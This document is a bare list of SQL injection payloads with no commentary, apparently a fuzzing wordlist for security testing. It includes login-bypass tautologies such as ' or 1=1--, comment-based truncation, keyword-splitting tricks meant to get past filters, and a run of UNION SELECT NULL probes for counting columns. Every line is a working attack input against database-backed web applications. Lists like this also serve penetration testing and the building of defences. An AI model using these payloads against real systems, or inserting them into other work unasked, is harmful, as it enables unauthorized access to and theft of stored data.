'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
'||'6
(||6)
' or 1=1-- 
or 1=1
' or '1'='1
; or '1'='1'
" or isNULL(1/0) /*
' or '7659'='7659
' -- 
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'unusual' = 'unusual'
' or 'something' = 'some'+'thing'
' or 'text' = n'text'
' or 'something' like 'some%'
' or 2 > 1
' or 'text' > 't'
' or 'whatever' in ('whatever')
' or 2 between 1 and 3
' or username like char(37);
' union select 
'; execute immediate 'sel' || 'ect us' || 'er'
'; exec ('sel' + 'ect us' + 'er')
' and 1 in (select var from temp)--
' UNION SELECT NULL-- 
' UNION SELECT NULL,NULL-- 
' UNION SELECT NULL,NULL,NULL-- 
' UNION SELECT NULL,NULL,NULL,NULL-- 
' UNION SELECT NULL,NULL,NULL,NULL,NULL-- 
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL-- 
